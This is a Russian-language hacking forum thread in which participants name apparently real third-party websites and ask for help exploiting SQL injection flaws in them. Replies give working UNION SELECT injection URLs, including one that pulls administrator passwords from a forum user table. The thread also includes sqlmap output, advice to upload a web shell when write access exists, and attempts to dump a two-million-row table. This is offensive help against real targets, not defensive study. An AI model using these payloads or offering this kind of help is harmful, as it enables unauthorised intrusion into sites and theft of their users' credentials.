Ваши вопросы по уязвимостям.

Если есть права на запись, то можно залить минишелл.

 

Тут зависит от версии Phpmyadmin. Узнаешь версию и идешь в гугл за поиском експлоита, в гугле так и пишешь:exploit phpmyadmin
внекоторых версиях встречается такая уязвимость как php-Injection

 

http://www.drive-direct.ru/?go=servis&catid=38

Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?

 

Бд: MySQL 3
Название: 1gb_drivedir

 

Вобщем постоянно натыкаюсь на одно и то же.. что хавиж, что sqlmap.. находим time-based инъекцию. но потом нещадно губит надежды нежеланием даже на уровне раскрытия таблиц. Т.е. иммя базы сказала, и вроде должно пойти но, не может почему-то.. то что у всех так установлены права на sql юзеров не поверю

[16:34:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:34:43] [INFO] retrieved:
[16:34:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:35:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[16:35:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:35:03] [CRITICAL] unable to retrieve the number of database users

это я юзерс хотел посмотреть.... собственно с этого всё начинается

 

При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?

 

нет!

 

хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
"DB query error.
Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
Please try later."
Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?

 

ордер бай потом селект
если фильтры не режут

 

Что-то интересное:
senpolia.info/news/79'/

 

По той ссылке нет ничего.
Но кое что забавное есть в другом месте:

http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/
http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad

вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет

 

Как вариант.

 

http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885

В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?

 

Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.

Code:

http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+

Как отфильтровать U_Username по U_Status='Administrator'?

Ответ:

Code:

http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+w3t_Users+where+U_Status='Administrator'+--+

 

используй where

 

http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок

 

39 же

Code:

http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--

смотри тайтл

 

Есть скуля, на сайте таблица размеров в 2 млн записей

Показывает 2млн записей
Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?